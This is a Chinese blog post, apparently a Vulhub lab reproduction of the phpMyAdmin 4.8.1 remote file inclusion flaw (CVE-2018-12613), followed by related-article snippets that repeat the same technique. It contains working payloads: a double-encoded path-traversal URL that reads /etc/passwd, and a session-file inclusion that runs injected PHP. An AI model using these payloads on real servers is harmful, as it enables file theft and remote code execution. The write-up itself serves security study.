CVE-2018-12613 phpmyadmin 4.8.1 远程文件包含漏洞

最新推荐文章于 2023-08-04 06:52:10 发布
最新推荐文章于 2023-08-04 06:52:10 发布
阅读量2.7k 收藏 1
点赞数
分类专栏: 漏洞 文章标签: 安全 mysql php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51387754/article/details/121761923
版权

漏洞简介

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。

漏洞环境

执行如下命令,启动phpmyadmin 4.8.1:

docker-compose up -d

环境启动后,访问http://your-ip:8080,即可进入phpmyadmin。配置的是“config”模式,所以无需输入密码,直接登录test账户。

漏洞复现

访问http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd,可见/etc/passwd被读取,说明文件包含漏洞存在:

http://127.0.0.1:8080/index.php?target=db_sql.php?/../../../../../../../../../etc/passwd

在这里插入图片描述

看一下数据库位置

show global variables like "%datadir%"

在这里插入图片描述/var/lib/mysql/

利用方式也比较简单,可以执行一下SELECT '<?=phpinfo()?>';,然后查看自己的sessionid(cookie中phpMyAdmin的值),然后包含session文件即可:

在这里插入图片描述
拼接url

http://127.0.0.1:8080/index.php?target=db_sql.php?/../../../../../../../../tmp/sess_fdf008286ccba0c295db95dded641120

在这里插入图片描述

GuiltyFet
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[vulhub]_phpmyadmin_4.8.1_远程文件包含(cve-2018-12613)复现&RCE实现
fightte的博客
06-05 586
[网络安全任重道远] ~ 题目有点长 ~ 是这样的。这是vulhub的复现,算是第一个接触的vulhub吧,FFFLLLAAAGGG ~ vulhub ----- 是一个漏洞集成平台,依赖于docker,可以方便的复现漏洞,github上有 phpmyadmin ----- 是网页版的数据库管理工具, CVE编号是 ----- CVE-2018-12613, 其漏洞有 ----- 文件包含远程命令执行, ~ 过程 漏洞具体原因可参考: https://www.cnblogs.com/leixiao-/p/
记一次phpmyadmin 4.8.1 远程文件包含漏洞(BUUCTF web)
ancan8807的博客
07-28 397
题目很简单,一个滑稽 打开源码,发现存在source.php文件 于是访问文件,发现出现一串php源码 提示存在hint.php,于是访问发现一句话 flag not here, and flag in ffffllllaaaagggg 再回过头来观察source.php明显是一道代码审计的问题,其中存在4个限制条件 $_REQUEST['f...
phpMyAdmin4.8.1 文件包含漏洞
测试
07-07 1565
起因一个很简单的漏洞, 分析的文章也都出来了很多, 但是看了那些文章, 我一直搞不懂为啥问号要双重url编码, 我自己看那些文章感觉不编码应该也能成功利用的。 并且好像大家对问号编码的说法各有不同。 还是自己下载了份源码看了一下。 4.8.1下载地址:https://files.phpmyadmin.net/phpMyAdmin/4.8.1/phpMyAdmin-4.8.1-all-lan...
CVE-2018-12613(远程文件包含)
weixin_59872639的博客
03-01 235
受影响版本 phpMyAdmin 4.8.0和4.8.1 环境 Vulhub - Docker-Compose file for vulnerability environment 漏洞利用 ?target=db_sql.php%253f/../../../../../../../../etc/passwd 因为`%253f`二次url解码后是`?`,整体变成 ?target=db_sql.php?/../../../../../../../../etc/passwd ...
phpmyadmin 4.8.1 远程文件包含漏洞CVE-2018-12613
EC_Carrot的博客
07-20 175
漏洞简介 phpMyAdminphpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 phpMyAdmin 4.8.2之前的4.8.x版本中存在安全漏洞。攻击者可利用该漏洞包含(查看并可能执行)服务器上的文件。 漏洞复现 访问http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 可见
phpMyAdmin4.8.1
07-06
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法,方便编写网页时所需要的sql语法正确性。
phpmyadmin4.8.1远程文件包含漏洞(CVE-2018-12613)
weixin_63231007的博客
10-08 2686
_REQUEST['target'] 搜索数组$target_blacklist 中不存在指定的值( ‘import.php’, ‘export.php’)target=db_sql.php%253f/../../../../../../../../../../tmp/sess_[session]target=db_sql.php%253f../../../../../../../../flag 得到flag。$_REQUEST['target'] 参数携带的内容是字符串。
phpMyAdmin 4.8.1后台文件包含漏洞CVE-2018-12613
qq_45521281的博客
04-27 3054
这篇文章将分享一个phpMyAdmin 4.8.1版本的文件包含漏洞,从配置到原理,再到漏洞复现进行讲解,更重要的是让大家了解这些真实漏洞背后的知识。 文章目录一.phpMyAdmin二.phpMyAdmin基础用法三.漏洞原理四.phpMyAdmin漏洞复现 一.phpMyAdmin phpMyAdmin是一种MySQL数据库的管理工具,安装该工具后,即可通过Web形式直接管理MySQL数据,而...
phpMyAdmin 4.8.1 远程文件包含漏洞CVE-2018-12613
网络安全。
01-18 1902
0x01 简介 phpMyadmin 4.8.1版本的index.php中存在文件包含漏洞,通过二次编码可绕过过滤。 0x02 漏洞复现 1.将?进行两次URL编码为&quot;%253f&quot;,构造下列payload: http://xxx:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 漏洞存在。 2.在S...
E042-服务漏洞利用及加固-利用CVE-2018-12613漏洞实现远程文件包含.pdf
12-02
E042-服务漏洞利用及加固-利用CVE-2018-12613漏洞实现远程文件包含
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
通过升级openssh到OpenSSH8.4 修复openssh低版本的漏洞 openssh8.4需要的 openssl-1.1.1g, openssh-8.4p1,zlib-1.2.11
CVE-2018-18778.docx
07-23
CVE-2018-18778 ,mini_httpd任意文件读取漏洞
weblogic10.36 CVE-2018-2893补丁文件
08-02
WebLogic(CVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),因该漏洞修补不善导致被绕过。...
CVE-2018-12613 PHPmyadmin文件包含漏洞分析及漏洞利用
丶没胡子的猫
11-20 3863
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞利用漏洞加固 漏洞描述    影响版本 漏洞环境搭建 漏洞分析 漏洞利用 漏洞加固
CVE漏洞复现-CVE-2018-15664 符号链接替换漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
08-04 389
docker cp 命令用于再Docker创建的容器与宿主机文件系统之间进行文件或目录复制。
phpmyadmin 4.8.1 远程文件包含漏洞
永不垂头的博客
08-14 468
phpmyadmin 4.8.1 远程文件包含漏洞 文章目录phpmyadmin 4.8.1 远程文件包含漏洞一、漏洞详情二、漏洞复现1.任意文件包含2.任意代码执行3.向数据库写入php代码4.包函session文件三、我的公众号 一、漏洞详情 首先在index.php 50-67行代码 满足5个条件后就会include$_REQUEST[‘target’]的内容 $_REQUEST[‘target’]不为空 $_REQUEST[‘target’]是字符串 $_REQUEST[‘target’]不
CVE-2016-5734
最新发布
09-04
CVE-2016-5734是一个针对PHPMyAdmin漏洞,该漏洞允许远程攻击者执行任意命令。该漏洞可以通过使用提供的Python脚本来利用,脚本可以在指定的URL上执行特定命令。如果你想进一步了解该漏洞以及如何分析它,可以参考提供的链接。如果你想在本地环境中测试该漏洞,可以下载并安装vulhub,并进入/vulhub/phpmyadmin/CVE-2016-5734目录,然后使用提供的命令启动环境。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [buuctf [PHPMYADMIN]CVE-2016-5734](https://blog.csdn.net/qq_36241198/article/details/115017777)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CVE-2016-5734 Phpmyadmin后台代码执行漏洞复现](https://blog.csdn.net/weixin_41924764/article/details/113063083)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

GuiltyFet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值